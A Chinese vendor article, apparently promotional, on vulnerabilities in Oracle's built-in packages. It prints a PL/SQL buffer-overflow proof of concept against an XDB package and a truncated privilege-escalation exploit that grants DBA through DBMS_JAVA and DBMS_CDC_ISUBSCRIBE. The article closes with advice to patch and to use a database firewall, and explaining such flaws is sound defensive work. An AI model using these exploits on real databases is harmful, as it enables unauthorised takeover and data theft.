數(shù)據(jù)安全治理關(guān)鍵技術(shù)之?dāng)?shù)據(jù)庫脫敏技術(shù)詳解
數(shù)據(jù)安全治理之API監(jiān)測系統(tǒng) ,解決API接口安全問題【安華金和】
新一代數(shù)據(jù)庫脫敏技術(shù),為敏感數(shù)據(jù)建立保護盾!
數(shù)據(jù)庫脫敏系統(tǒng)與金融行業(yè)案例解讀
數(shù)據(jù)安全治理建設(shè)思路的著力點——數(shù)據(jù)安全咨詢服務(wù)【安華金和】
數(shù)據(jù)庫防火墻功能有哪些?-數(shù)據(jù)安全-安華金和
數(shù)據(jù)安全關(guān)鍵技術(shù)之?dāng)?shù)據(jù)庫脫敏技術(shù)詳解【安華金和】
中國數(shù)據(jù)安全治理落地指導(dǎo)書籍《數(shù)據(jù)安全治理白皮書5.0》正式發(fā)布(附下載)
許多數(shù)據(jù)庫系統(tǒng)都提供大量內(nèi)建的存儲過程和軟件包。這些存儲過程對象為數(shù)據(jù)庫提供了額外的幫助,同時幫助管理員和開發(fā)者管理數(shù)據(jù)庫系統(tǒng)。
例如目前用戶量最廣的Oracle數(shù)據(jù)庫,默認情況下在安裝時便擁有多達30000個可以公開訪問的對象,這些對象為許多任務(wù)(包括訪問OS文件、發(fā)送HTTP請求、管理XML對象、java服務(wù)以及支持復(fù)制)提供相應(yīng)的功能。這些功能都會在網(wǎng)絡(luò)上開啟對應(yīng)端口,而每多開一個網(wǎng)絡(luò)端口就為數(shù)據(jù)庫安全造成多一份入侵威脅。
這些內(nèi)建對象包含的漏洞覆蓋了:SQL注入、緩沖區(qū)溢出和應(yīng)用程序邏輯漏洞等。Oracle的內(nèi)建包中含有大量這種漏洞,我們下面就拿一個XDB上緩沖區(qū)溢出的漏洞舉例。
Declare
buff varchar2(32767);
begin
buff :=’12345678901234567890123456789’;
buff :=buff||buff;
buff :=buff||buff;
buff :=buff||buff;
buff :=buff||buff;
buff :=buff||buff;
buff :=’12345678901234567890123456789’;
XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;
同樣java也存在大量此種漏洞,并且危害比上面的XDB還嚴(yán)重
…..DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’,’oracle/aurora/rdbms/DbmsJava’,’SYS’,’writeOutputToFile’,’TEXT’,NULL,NULL,NULL,NULL 0,1,1,1,1,0,’ DECLARE PRAG…….
EXEC DBMS_CDC_ISUBSCRIBE……
上面這個漏洞是針對ORACLE 11.1系列 的JAVA漏洞。利用DBMS_CDC_ISUBSCRIBE 包可被 任意帳號執(zhí)行,但這個包的創(chuàng)建者是sys。如果執(zhí)行DBMS_CDC_ISUBSCRIBE 的回話是sys,就可以執(zhí)行sys權(quán)限(提權(quán)到DBA)DBMS_JAVA.SET_OUTPUT_TO_JAVA 函數(shù)可以把system.err的java重定向到一個新的會話中。于是我們故意輸入錯誤參數(shù)導(dǎo)致DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOW 產(chǎn)生錯誤,并把錯誤寫入到system.err中。同時創(chuàng)建一個新SYS權(quán)限會話 。真正被執(zhí)行的語句是 EXECUTE IMMEDIATE "grant dba to user()"
我們從上面的例子中不難看出這種漏洞對于數(shù)據(jù)庫安全的危害很大。建議數(shù)據(jù)庫的使用者及時更新數(shù)據(jù)庫廠商發(fā)布的官方補丁,同時關(guān)閉不必要的對象以及對應(yīng)端口。如果由于某種原因無法對數(shù)據(jù)庫進行補丁升級,建議使用帶VPATCH功能的數(shù)據(jù)庫防火墻保護數(shù)據(jù)庫安全。